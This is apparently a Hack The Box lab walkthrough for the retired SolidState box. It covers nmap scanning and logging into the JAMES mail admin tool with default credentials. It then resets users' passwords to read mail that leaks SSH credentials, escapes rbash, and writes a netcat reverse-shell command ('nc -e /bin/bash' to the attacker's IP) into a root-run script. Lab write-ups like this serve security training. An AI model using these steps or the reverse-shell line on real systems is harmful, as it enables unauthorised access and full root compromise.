HTB Walkthrough: SolidState w/o Metasploit (retired)

SolidState is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: SolidState| Difficulty Level: Medium | Operating System: Linux

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/SolidState]
└─# nmap -sC -sV -oA SolidState 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–16 13:50 EDT
Nmap scan report for 10.10.10.51
Host is up (0.097s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.14 [10.10.14.14]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home — Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(root💀kali)-[/home/kali/labs/HTB/SolidState]
└─# nmap -p- -Pn -oA Allports 10.10.10.51
Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–16 14:25 EDT
Nmap scan report for 10.10.10.51
Host is up (0.10s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip

Enumeration

┌──(root💀kali)-[/home/kali/labs/HTB/SolidState]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51…
Connected to 10.10.10.51.
Escape character is ‘^]’.
HELP
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
Password:

Looking for James RAT 2.3.2 exploit, I came across this: https://www.exploit-db.com/exploits/35513 Trying the default credentials (root/root) mentioned in the exploit via telnet and it worked.

┌──(root💀kali)-[~]
└─# telnet 10.10.10.51 4555
Trying 10.10.10.51…
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Let us change all the user’s password and try to read the emails.

setpassword mindy pass123
Password for mindy reset

USER mindy
+OK
PASS pass123
+OK Welcome mindy
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

USER john
+OK
PASS pass123
+OK Welcome john
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy’s access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

SSH into server using mindy’s credentials. You will get user flag.

Privilege Escalation

We have restricted rbash shell. Try below ssh login to escape the restriction. https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/

┌──(root💀kali)-[/home/kali/labs/HTB/SolidState]
└─# ssh mindy@10.10.10.51 -t ‘bash — noprofile’

Running enumeration script (linpeas.sh)

[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
/opt/tmp.py

The script runs periodically to clean tmp folder with root access. Changing the script (tmp.py) to reverse shell script.

os.system(‘/bin/nc -e /bin/bash <Kali IP> 9876’)

Open a nc session in kali and you will get root shell + root flag.

Note: It takes few seconds for root shell to come back. Do not try to execute the script yourself, that will give you user shell and not root shell.